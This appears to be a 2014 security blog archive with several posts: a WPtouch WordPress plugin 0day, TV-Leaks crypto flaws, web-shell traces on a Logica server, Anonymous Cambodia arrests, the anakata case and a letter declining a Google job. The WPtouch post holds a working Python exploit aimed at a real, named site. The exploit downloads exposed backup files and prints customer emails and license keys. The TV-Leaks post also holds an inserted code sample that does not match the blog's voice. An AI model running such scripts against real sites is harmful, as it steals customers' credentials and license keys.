0day: Extracting WPtouch Mobile Plugin License Keys

September 24th, 2014 by qnrq

With 6,030,141 downloads the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers “pro” functionality for which users need to pay. WPtouch suffers from information disclosure vulnerabilities, and today I’m going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up until the current 3.4.10; I have not bothered to test them all.

Having a quick peek at the pro functionality we can discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup procedure and read the contents of a backup file by undoing each step in the opposite order:

unserialize( gzuncompress( base64_decode( file_get_contents( $backup_file_name ) ) ) );

Naturally, that is more or less precisely what wptouch_restore_settings() does. wptouch_backup_settings() uses the same call to wptouch_get_settings() as anything else that needs to read a WPtouch setting: it calls get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn’t protect the directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named ‘wptouch-backup-‘ . date( ‘Ymd-His’) . ‘.txt’, completely accessible to anybody who knows where to look. The wptouch-data and wp-content directories may of course be renamed, so being able to determine their paths is a prerequisite for this to work (dork inurl:”wptouch-data”).

When get_settings() is called by the backup routine it includes the plugin’s “BNCID” settings which, in turn, contain the customer’s configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user’s credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up targeting the least popular site I could find with my very low patience:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        dict = objs[b"bncid"]._asdict()
        cust_email = dict[b"bncid"].decode("utf-8")
        license_key = dict[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny www access to the WPtouch backup directory and contained files
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to backup the license key?)

TV-Leaks Is Broken and Dangerous

September 18th, 2014 by qnrq

In 2013 SVT, Sveriges Television, launched its whistleblowing platform inspired by Wikileaks. TV-Leaks intends to make it easier for Swedish whistleblowers to leak sensitive information to journalists. The problem is that TV-Leaks suffers from a long list of vulnerabilities.

Unencrypted attachments

The form allows visitors to upload files. Even worse: if the encrypted message is too long users are recommended to send it as an attachment instead:

// Check that the length of the above is not too long
if ($('#encryptedMessage').val().length > 131072)
{
    alert("Meddelande-texten är för lång, prova med att skicka med en bilaga istället.");
    return false;
}

TV-Leaks does not encrypt attachments:

$('#encryptedMessage').val(openpgp.write_encrypted_message(pub_key, message));

Submitting the form with all fields set to “test” and attaching the file “test.txt” containing the string “test” POSTs the following:

-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="title"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="files[]"; filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="department"\r\n\r\nsvtnyheter\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="email"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="encryptedMessage"\r\n\r\n-----BEGIN PGP MESSAGE-----\r\nVersion: OpenPGP.js v.1.20130712\r\nComment: http://openpgpjs.org\r\n\r\nwcBMA9CgkCCRTSS6AQgAgBc3+aFzhuX9d5tqgKmdP7bbsj/HCZgu7Je1qMMs\r\nvefcPPE8gJfpT2zPB023dG11msmbp+3PUXV4qWPYJiwe0CqjshQR6JpdubB7\r\nmP6qrKPiTlOFxaR5E5PTlr0pfdBch6MblCCngQEUVDCcfTIBWnG/4khb+day\r\n8Dd3x0AD8+PmP7EAS2tdv52nwfXc4oMTMhrNRLTBEo0K4osrfr+83WJ62OcN\r\npBkXIpq6MIwPbmeh6HEm6jfrgWmqgYNdOqpkxCF1dwW0f8mC2KKUkhEhbNSd\r\nrFAycEZSEt9rxNNhYRnH/DstM+s8Pf/AgU/mtkNYwSGn8qapvyTPEa/1eiOw\r\nEtJ7ATXj3qFOUuDzoKPkD5KiVmowYX18pcYMkp73ZWe6HBVPPFc9Ir0QGLg2\r\nR9S6IeFBRRnUueYhFCko5gZz5aGrZCGfZOwRQ0bCpRbMvnSEjBZS6JCZYGD2\r\nd9NuSY0qYwQsdGGNb14VFA01gbHQw+1YZvvoAEKY/StL1V6M\r\n=OigO\r\n-----END PGP MESSAGE-----\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="notEncryptedMessage"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="submitButton"\r\n\r\n\r\n-----------------------------17354154294744539562044116888--\r\n

Notice that the attached file is sent in plaintext:

filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n
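To make the point above mechanical, here is an added example (not TV-Leaks code) that parses a captured multipart/form-data body with Python’s standard email parser and classifies every field as empty, PGP-armored or cleartext. The body below is a constructed, shortened copy of the POST shown above with a placeholder in place of the real PGP message.

```python
"""Classify the parts of a captured multipart/form-data POST (added example)."""
from email import policy
from email.parser import BytesParser

PGP_ARMOR = b"-----BEGIN PGP MESSAGE-----"

# Constructed, shortened version of the captured POST body. The boundary value
# follows the one in the post; the PGP body is a placeholder, not a real message.
BOUNDARY = b"-" * 27 + b"17354154294744539562044116888"
CAPTURED_BODY = (
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="title"\r\n\r\n\r\n'
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="files[]"; '
    b'filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n'
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="department"\r\n\r\n'
    b"svtnyheter\r\n"
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="encryptedMessage"\r\n\r\n'
    b"-----BEGIN PGP MESSAGE-----\r\nVersion: OpenPGP.js v.1.20130712\r\n\r\n"
    b"PLACEHOLDERBASE64\r\n=XXXX\r\n-----END PGP MESSAGE-----\r\n\r\n"
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="notEncryptedMessage"\r\n\r\n\r\n'
    b"--" + BOUNDARY + b"--\r\n"
)


def parse_form_parts(body, boundary):
    """Wrap the raw body in the Content-Type header the server saw and split it into parts."""
    header = b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n\r\n"
    msg = BytesParser(policy=policy.default).parsebytes(header + body)
    parts = []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        payload = part.get_payload(decode=True) or b""
        parts.append((name, filename, payload))
    return parts


def classify_parts(body, boundary):
    """Label each form field: empty, pgp (armored OpenPGP message) or cleartext."""
    result = []
    for name, filename, payload in parse_form_parts(body, boundary):
        stripped = payload.strip()
        if not stripped:
            state = "empty"
        elif stripped.startswith(PGP_ARMOR):
            state = "pgp"
        else:
            state = "cleartext"
        result.append({"name": name, "filename": filename, "state": state})
    return result


def cleartext_uploads(classified):
    """File attachments that left the browser without any encryption."""
    return [p["filename"] for p in classified
            if p["filename"] is not None and p["state"] == "cleartext"]


if __name__ == "__main__":
    parts = classify_parts(CAPTURED_BODY, BOUNDARY)
    for p in parts:
        print("%-22s %-10s %s" % (p["name"], p["state"], p["filename"] or ""))
    print("cleartext uploads:", cleartext_uploads(parts))
```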

Outdated and vulnerable OpenPGP.js

TV-Leaks uses OpenPGP.js.

this.versionstring="OpenPGP.js v.1.20130712";

This version is vulnerable to the findings in Cure53’s security audit of OpenPGP.js: Cleartext Messages Spoofing, EME-PKCS1-v1_5 padding uses Math.random(), Cleartext Message Spoofing in Armor Headers, EME-PKCS1-v1_5 Error Handling in RSA Decryption, Errors in EMSA-PKCS1-v1_5 decoding routine and Side-channel leak in RSA decryption, just to mention the most serious issues.

The pubkey


The public key was generated using dodgy BouncyCastle Java crypto library v1.6.1.0. The public key should be replaced by a key generated by something properly functional and well-tested: GnuPG.

2048 bit keys should be considered as a replacement for the current 1024 bit. NIST has disallowed the use of 1024 bit keys after 31 December 2013 because they are insecure. 1024 bit RSA, which TV-Leaks uses, is broken.

Classical JavaScript verification issue

As usual, JavaScript crypto is a risk by nature since there’s no way for the client to verify that the file sent by the server is the expected file. Classic MITM risk with JavaScript crypto, not exclusive for TV-Leaks.

Is TV-Leaks safe to use?

Not at all.

Logica Infiltrated Multiple Times By Automated Tools

September 15th, 2014 by qnrq

Logica, later CGI, was on the list of companies hacked in what has been called Sweden’s largest hacking case. In their report on the IT security incident of 2012 they wrote that the perpetrators managed to get system access at the end of February 2012, believing 2012-02-25 to be the start date but that a series of attack attempts had been launched earlier.

On 26th August the Swedish Defence Force (Försvarsmakten), FRA (Swedish National Defence Radio Establishment), Swedish Police and Swedish Civil Contingencies Agency held a talk describing modern cyber threats during a conference on information security held by the Swedish government. The talk mentioned the breaches of Logica’s systems but more importantly it was said that Logica had been hacked months before the incidents involving the mainframe had occurred. The PDF containing the slides from the talk can be downloaded here with page 18 showing a screenshot of a mirrored defacement page.

“When the main investigation started, there were a lot of uncertainties on what parts were compromised or which potentially other systems were involved in the incident. Thus there have been a number of different side tracks during the main investigation.” – Logica security incident report page 28

One of those side tracks involved a computer named SCAP0023 in Logica’s incident report. At this point it is worth clarifying that the PDF of the incident report available on the Internet was scanned from its physical copy and then digitized. Some characters in the PDF are incorrect due to OCR; for example “E” may have been recognized as “C”. Quoting Wikileaks on the matter: “The material is formally public, but the Swedish prosecution authority has refused to provide the documents in digital format. Photocopying this volume of paper costs around £350.”

Inspired by the way the Danish Police is able to conduct forensic analysis and secure evidence without even seeing the computers in question, I set out to do the same thing. With a little black Internet magic I waded through the Internet Archive Wayback Machine and discovered 108 mirrored URLs for ux.logica.se, the same Logica domain which was hacked before the mainframe intrusions occurred.

“SCAP0023 Server hosting multiple web servers for many legacy companies in the Logica group, e.g. WM-Data.” – Logica security incident report page 22

For the sake of a somewhat easily viewable timeline, the Wayback Machine mirrored URLs in the following order:

May  16 2011 http://ux.logica.se:80/.?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=start
May  17 2011 http://ux.logica.se:80/index.php?page=we_are
May  17 2011 http://ux.logica.se:80/index.php?page=we_do
July 17 2011 http://ux.logica.se:80/index.php?page=contact

One month later, on August 23 2011, Zone-H created the mirror of the defacement page which was included in the talk at the yearly information security conference held by the Swedish government. The ux.logica.se domain had been defaced by ir4dex.

Suddenly the Wayback Machine picked up some interesting paths:

February 15 2012 http://ux.logica.se:80/tmp/cases/case7.php
February 16 2012 http://ux.logica.se:80/tmp/cases/?act=ls&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp&sort=0a
February 17 2012 http://ux.logica.se:80/tmp/cases/
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=about
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=chmod&f=c999sh_backconn.278.c&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp%5Ccases
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=selfremove

Half a year after ir4dex defaced ux.logica.se the Wayback Machine was crawling malicious files on Logica’s server: the C99 and Fx29 PHP shells, two popular tools used as part of automated website penetration. Not only had Logica been defaced, the Wayback Machine was indexing backdoors six months later.

[Screenshot: logica_web_shell]

A cached version of the Fx29 shell reveals a server containing four drives: A:\, C:\, D:\ and E:\. E:\ contained the web root directory, more specifically E:\Inetpub\wwwroot\ux.logica.se\, with 5.31/15 GB disk usage. It was running Microsoft IIS 6.0 and PHP 5.2.9 on Windows NT SE-AP0023 5.2 build 3790 as user IUSR_SE-AP0023.

SE-AP0023 sounds like something that could have been misread as SCAP0023 during the digitization of Logica’s security incident report. The server was investigated as a side track. Unfortunately Logica wrote very little about its investigation of this server:

“Appendix Y: SCAP0023/www.wmdata.* investigative side track
The SCAP0023 server is a server hosting web pages for Logica, not their customers. The web pages and the domains associated with that system is to host a legacy web for one of the previous company names and companies that make up the current Logica company. The old company was name “WMData”.

The incident involving SCAP0023 was related to defaced web pages, e.g. unauthorized and maliciously changed web pages.

The detailed info from this incident is based on performing analysis of the disk.

SCAP0023 is a Windows server system running IIS.

The defacement was added on multiple web sites hosted by the SCAP0023 server on August 2011, thus many months before the (current) incident involving the mainframe.

A forensic investigation was initiated on the disks that have been part of the system. The investigation showed that the defacements were performed with automated tools. And that the system were attacked and infiltrated multiple times.” – Logica security incident report page 534

The given description fits perfectly with the hacked SE-AP0023 found through the Wayback Machine. By reading the cached versions of the PHP shell we can extract some more interesting details, namely the files related to the hack:

February 13 2012 12:42:39 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\
February 13 2012 13:18:24 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.278.c
February 13 2012 13:19:01 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.756.pl
February 13 2012 13:38:17 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\case7.php
February 13 2012 14:40:43 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\nc.exe
February 25 2012 15:42:13 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\attack(1).asp
February 26 2012 07:04:51 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\11.aspx
March    19 2012 05:01:46 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\sa.php

Logica wrote in its report that it believes 25th February 2012 to be the first day of relevant attacks. You should notice that this was the first day that somebody uploaded a file with an ASP file extension: “attack(1).asp”. However, even before this day the server had been defaced and backdoored, and the only action that Logica took was to remove the defacement page, leaving both vulnerabilities and backdoors in production.

It appears that all intrusions against this webserver occurred through the same vulnerability which enabled attackers to write to the .\tmp\cases\ directory, which in the Wayback Machine’s latest crawl of the PHP shell was listed as both readable and writable for the user serving the web content.

Uncle Dane wants YOU!

August 20th, 2014 by qnrq

You may have heard about Danish and Swedish agents interrogating possible witnesses as preparation for the trial against anakata in September.

Here’s the sweet deal they have to offer (tl;dr: free transportation, DKK 20/h, tourist class hotel room):

You are hereby summoned to meet in:

The Court at Frederiksberg, Howitzvej 32, 2000 Frederiksberg, Court 001,

Please see attached letter.

Please confirm receipt and do not hesitate to contact me if you have questions.

Med venlig hilsen

Jens Jørgensen

Kriminalassistent

Efterforskningsenheden

Afdelingen for personfarlig kriminalitet

Særlige sager, sektion II

Postadresse: Politigården, 1567 København V.

Besøgsadresse: Teglholms Alle 1-3, 2450 København SV

You are hereby summoned to meet in

The court at Frederiksberg, Howitzvej 32, 2000 Frederiksberg, Court 001

You shall in court give statement as a witness in the case against Per Gottfrid Svartholm Warg and JT, regarding the period from 13th of February 2012 to the 30th of August 2012, to have gained access to a society important information system belonging to CSC Danmark A/S, containing a large quantity of data, including personal information belonging to private and public companies.

As witness you have the right to get your transportation expenses to and from Denmark reimbursed. If it is necessary, you will free of all charge, be provided with a hotel room – tourist class – during the stay in Denmark. You also have a right to witness compensation of DKK 40, for every started period of 2 hours you are away from home or work, because you have to meet in court.

If you declare you understand and accept to show in court, you are asked to address yourself to the Copenhagen Police, Public Prosecutor’s Department of Violent Crime at * or email [email protected], where you will receive further information about pay-out of witness compensation and so on. Witness compensation will be paid when you meet in court, but by addressing Copenhagen Police you can have an airplane ticket sent. The police will also see to any, if necessary, hotel reservation. In case you are prevented to show, you are asked to give information hereof to Copenhagen Police, Public Prosecutor’s Department of Violent Crime at * or email [email protected]

In case the fixed witness compensation does not cover the costs or loss, e.g. of regular income you have by appearing in court, the court can give you an increased witness compensation. You should give notice of this before you appear, and you should in that case be able to document the loss, e.g. by statement from employer.

Please bring this Witness Summons to court with you.

Anonymous Cambodia: The OPSEC disaster

June 17th, 2014 by qnrq


On the 30th August, 2012, a group of police officers met outside a local minimart near Riverside in Phnom Penh, Cambodia. Their mission was to raid and arrest anakata in his apartment located nearby as requested by Swedish authorities.

A group of hacktivists that calls itself NullCrew was quick to take revenge, carrying out attacks under the suitably chosen name “Operation TPB”. On the 2nd September, 2012, they began leaking documents, usernames and passwords from Cambodian computer systems. They attacked the Cambodian Ministry of Public Works, the Institute of Standards, the general taxation department and the military. NullCrew’s attacks hit the local media and this is where the story about Anonymous Cambodia begins.

Most likely inspired by the press coverage of NullCrew’s attacks the Cambodian branch of Anonymous was formed. They adopted NullCrew’s OpTPB and on 12th September, 2012, the day after anakata landed in Sweden, it was reported that Anonymous Cambodia had broken into and leaked sensitive data extracted from the Cambodian Ministry of Foreign Affairs and defaced its website calling for anakata’s release.

The Cambodian branch went silent for a while only to wake up ready for the national elections held in July, 2013. They began defacing sites to spread their political message and DDoSing those that they could not deface, accusing the ruling party of electoral fraud. Their mission was to topple the government led by the Cambodian People’s Party, which has ruled the country with an iron fist since the fall of Pol Pot and the Khmer Rouge regime.

“Because he has no formal training and uses programming scripts created by others, he said that he is a ‘script kiddie’ and not a true hacker.”

Less than two weeks before the election Anonymous Cambodia made their grand mistake. They participated in an interview with The Phnom Penh Post in which one of their members, “Black Cyber”, revealed personal information about himself and his agenda. In an interview with The Cambodia Daily he relied on “blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies”.

Black Cyber was portrayed as a twenty-something IT security consultant who had become involved in Anonymous by participating in Operation Payback targeting pro-copyright, anti-piracy organizations and payment processors which had withdrawn banking facilities from WikiLeaks, similar to the attacks which would later be carried out as revenge for the arrest of The Pirate Bay founder anakata. Black Cyber denied involvement in OpTPB.

The interview given by Black Cyber provided excellent profiling data for law enforcement agencies. He revealed the size of Anonymous Cambodia and claimed that three people had participated in attacks against the National Election Committee. Jao Kamsot, another individual who was interviewed for the article, said that he is a script kiddie and not a true hacker.


Immediately after the interview given by Black Cyber the Cambodian Ministry of Interior Department of Security began collaborating with the United States’ FBI in an investigation against Anonymous Cambodia. On 7th April, 2014, 21 year old Bun Khing Mongkul Panha, known online as Black Cyber, was arrested together with 21 year old Chou Songheng, alias Zoro.

The pair was charged with cyber crimes conducted against 30 government websites including the National Election Committee, Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality. They were charged with unauthorized access to an automated data processing system, obstructing the functioning of an automated data processing system and fraudulent introduction, deletion or modification of data. Black Cyber confessed immediately.

On 22nd April, 2014, an individual calling himself “Attacker Fiber” created a Facebook page named after the group, vowing revenge and posting YouTube videos showing how to conduct DDoS attacks. He used the page to market his own page (Attacker-Fiber) on which he advertised “Website Security Learning to be Anonymous” [sic] including SQL injection, defacement and backdoor techniques for $100 per course. He also set up a site titled “Cambodia Security” advertising the same services and posting guides for trivial things such as XAMPP installation.

On 29th April 2014 Anonymous Cambodia claimed on its Facebook page that they had breached the site belonging to the Anti-Corruption Unit promising further attacks. Dim Chaoseng, the lawyer defending the members of Anonymous Cambodia arrested earlier, expressed his concerns saying: “All the activity that Anonymous is doing at the moment is not going to help my clients. It is going to get more difficult to release my clients on bail.”


Only days after the claimed attacks against the Anti-Corruption Unit, on 1st May 2014, two additional (unnamed) members of Anonymous Cambodia were arrested and charged with disrupting the ACU using the moniker Game-Over-xX23xX.

Angered by the four arrests, on the 4th May 2014, the group attacked the Royal Gendarmerie, Ministry of National Defense and CamCERT (Cambodia Computer Emergency Response Team) demanding the release of their “comrades”. Military Police spokesman Kheng Tito was quoted saying: “I don’t think their group has many people, and we will wipe it out.”

On 4th June Attacker Fiber, a 17 year old boy named Chin Neangleangmeng, became the 5th arrested member of Anonymous Cambodia. He confessed immediately.

Since the arrest of Attacker Fiber the small but very cocky group has been very quiet online. Anonymous Cambodia is now held in Prey Sar Prison in Phnom Penh, which was built for 500 inmates but was reportedly the home of 3,000 inmates in 2011, and they will most likely stay there until the authorities figure out how to punish them as Cambodia is currently lacking many internationally common cybercrime laws to regulate hacking and DDoS attacks.

SÄPO doesn’t have time for virus scans

June 8th, 2014 by qnrq

Earlier this week Torrentfreak reported that the Danish police investigating anakata for hacking charges had discovered that the analyzed computer had been hacked and infected by malware. Kristina Svartholm reported that the computer had been infected by more than 500 trojans.

Let’s rewind the tape from Denmark to Sweden, where the same computer (seizure 2012-0201-BG25023-26) was used as evidence against anakata. My translated version of the Swedish Security Service’s investigation of remote control possibilities can be downloaded from here. I also wrote a short paper in response to the investigation report which can be read here (tl;dr version available here).

The 12 SLOC Python example that I wrote and included in the paper played an important role in having all intrusion and fraud charges regarding the Nordea bank dropped. In the paper I also called the investigators biased for working with the assumption that computers can only be remotely controlled in legit ways, such as PowerShell and Remote Desktop mentioned by anakata as technical possibilities in hearings.

The Swedish Court of Appeal agreed with the points that I made and that Jacob Appelbaum pointed out in his witness testimony: remote control could not be excluded, hence the SÄPO investigation written by Jesper Blomström fell. Anakata was however sentenced for intrusions dated 2011, as it was considered “unlikely” that the computer would have been hacked since 2011 without notice.

A very important point to raise here is the fact that Jesper Blomström was the same person who made the discoveries of sensitive data originating from Denmark on the computer in question. He was also the one who rang Denmark with his revelations. What Jesper found on the laptop and his investigation was the entire basis for extraditing Gottfrid from Sweden to face similar charges, with evidence originating from the same hard drive which the court in Sweden had already ruled may have been remotely controlled.

Let’s revisit the court hearing with Jesper:

“I also think that it’s important to read the introduction of the PM when reading the conclusions, because we were given a task from the Stockholm County Police department that the computer had been remotely controlled first through one way that we investigated and then another that we controlled, so that you have that in the back of your head when you read the PM.”

“It’s when we write that we don’t see any programs that have been used for remotely controlling the computer. Based on the given task and the circumstances then in those frames we don’t see any traces.”

“It can be worth adding that we haven’t looked at every file in every computer, because it’s like a giant haystack with enormous, thousands, of files in various ways. And then we would need to go through each individual program: is it this one that has remotely controlled, is it this, is it this, and that whole part. There hasn’t been any investigation like that on the computer because there is simply not enough time.”

The Swedish Security Service didn’t have time to do an antivirus scan on the computer and since the Stockholm County Police department didn’t specify it in their request nobody in Sweden appears to have scanned the computer for viruses.

This is outrageous on every level possible. Gottfrid was sentenced to jail in Sweden because the police didn’t have time to find anything that may have been in his favor. Guilty until proven innocent, eh?

This entire fiasco could have been avoided if Sweden had replaced the so called IT Security Specialists involved in the investigation with any ten year old from the street who learned Norton at Christmas family dinner, because obviously the computer was infected and obviously it was discovered as soon as somebody ran a virus scan.

Why I won’t work for Google

May 3rd, 2014 by qnrq

Hi Niklas,

Patrick here from Google.

I looked over your Github and LinkedIn profiles, and personal site (having found the panic_bcast project), and was keen to get in touch regarding a number of Engineering positions here at Google.

Your Open Source contributions and projects, Systems/Networking experience and development background looked relevant to what some of the engineers here are doing, but I wanted to touch base with you first to understand a bit more about your work.

If your schedule permits it, would you be open to a conversation next week?

The positions I had wanted to share with you are part of a mission-critical team that combines software development, networking and systems engineering expertise to build and run large scale, massively distributed, fault-tolerant software systems and infrastructure.

Thanks for your time and have a good weekend.

Best regards,
Patrick

Hi Patrick,

Thank you for reaching out to me and complimenting me on the panic_bcast project, it is always flattering being recognized by entities greater than oneself.

Before properly answering your question I would like to give you some background about myself and my relation to Google.

As a kid growing up Google would always be the most interesting employer one working in the technical industry could possibly imagine. Google would flex very playfully in line with its “Don’t do evil” agenda. I grew up as a very ideologically and principle driven individual, but foremost I was curious by nature. As a kid interested in information security and computers in general I quickly began exploring code by breaking it and systems by breaking into them driven by the force that information wanted to be free.

My father found out quickly and we had a long chat about life’s importance. He told me not to be reckless because the future would consist of tyranny and powerless people. He told me that in the future the world’s power structures would depend much on what I would today categorize as cypherpunks and hackers.

I feel that the future that my father explained to me as a kid is today’s present. Google says “Don’t do evil” on one hand, but on the other hand Google also reads the contents of its users’ emails and tracks their behavior on the Internet – two things which I would characterise as directly evil. Google reads the emails that my mother is writing and tracks what my friends are buying. For advertisement purposes, Google says, and we only discovered the true consequences later when Edward Snowden blew the whistle.

It turned out that Google had been helping American and European intelligence agencies illegally wiretap their own citizens. “We tried to fight back, we tried not to be evil!”, Google responds, but we never saw Google shut down its service in protest like Lavabit. We never saw Google fight back for the best of its users, which consists of a great majority of the world’s population. We saw Google justify its data inspection by saying that it was great for advertisement models.

We learned that Google is in fact doing very evil things to the majority of the world’s population. We learned that Google tends to sport the two edged sword. We learned that Google’s “open source as much as possible” policy only applies as long as they don’t disrupt existing flows of cash.

We witnessed Google sending cease and desist letters to the developers and maintainers of the popular Android CyanogenMod for violating some patents by modifying open source elements of an open source licensed project.

We learned that Google’s friendliness is a marketing scheme. We learned that Google is not what we thought it would be, that it is not fighting for what’s best for humanity but for what’s best for its own dollar.

I am different from Google in this sense. My principles are not compatible with those that Google is displaying and has displayed throughout history.

Due to my principles I would much rather delete all data Google has collected about its users which consists of myself, my family, my friends, my co-workers and everybody that they know that connects to and uses popular services on the public Internet. I would not be able to sleep at night knowing that I worked for a company which was directly threatening and targeting the people that I love.

I would never be able to develop the tyrannical tools required to keep the Google wheels spinning. I am on the opposite side of the spectrum. The project which you acknowledged, panic_bcast, I wrote to make it harder for law enforcement officers to gather evidence on political activists through cold boot attacks. Other projects I am mainly involved in because I believe in a free, unregulated stream of information on the public Internet.

I am one of those lucky individuals who can afford to work only on projects which I choose, and I choose to only involve myself in projects that I believe contribute something positive to the planet’s population. Google is not very high on that list, therefore I must respectfully decline your job offer.

“Gentlemen do not read each other’s mail.” – Henry L. Stimson

I wish you good luck on your quest to find the right candidate.

Regards,

Niklas

Life.

December 28th, 2013 by qnrq

Your consciousness spawns as a result of an imaginary nothing. You’re forced into an imaginary eternal maze purposefully filled with stress and anxiety.

Welcome to life: a game where players in your shoes have lost touch with nature and become mindless drones chasing fantasies of materialistic possessions backed by imaginary values, thus judging you thereafter – rather than character. On our deathbeds we’ll proudly tell the stories about all the megapixels we had, for that is what is most important.

Forget questioning, we’ll turn you into an outcast and stack the odds against you like Blackjack. We’ll guide you into temptation only to benefit from punishing you. We’ll call you sick, twisted and insane after paving the road and having established the pillars on which we built you.

Change, yes we can, everything except our opinions and habits, how else could we function? You can vote for the Pepsi or the Coke party, you see, we’re giving you a fair choice here. As Henry Ford said: you can have a car painted any color so long as it’s black. Did you wish to say something? Oh, sorry, we’ve run out of air time.

Swedish little piggy wants to shop invisibly

December 20th, 2013 by qnrq

Eight days ago I wrote about the mysterious events in Swedish aid donations to Cambodia in relation to anakata’s arrest in 2012, revealing that 2012 hit a peak with a ~$9.5 million increase which later dropped in 2013.

As usual the post was read by officials working for the Swedish government. More specifically, the Swedish Defence Research Agency read the article at 2013-12-16 09:14:22 AM; at 09:15:19 AM they clicked the Creeper icon in the menu to the right (and discovered that their surfing habits were being publicly recorded), and at 09:15:51 AM they read about anakata’s uncontrollable computer:

qnrq.se *   2013-12-16 09:15:51 – FOI, Totalförsvarets forskningsinstitut
gnuheter.com *  2013-12-16 09:15:19 – FOI, Totalförsvarets forskningsinstitut
qnrq.se *   2013-12-16 09:14:22 – FOI, Totalförsvarets forskningsinstitut

Today I can reveal that between the 16th and 20th of December the Swedish aid to Cambodia was mysteriously modified to display the total sum for 2013 as $36,400,000, instead of the $26,400,000 it listed eight days ago.

Between four days ago, when the revelation was read by the Swedish Defence Research Agency, and today, the aid sum was bumped on OpenAid.se by exactly $10 million. There is currently no further explanation for where the extra $10 million has come from, but it is incredibly close to the estimated price for extracting anakata from Cambodia.

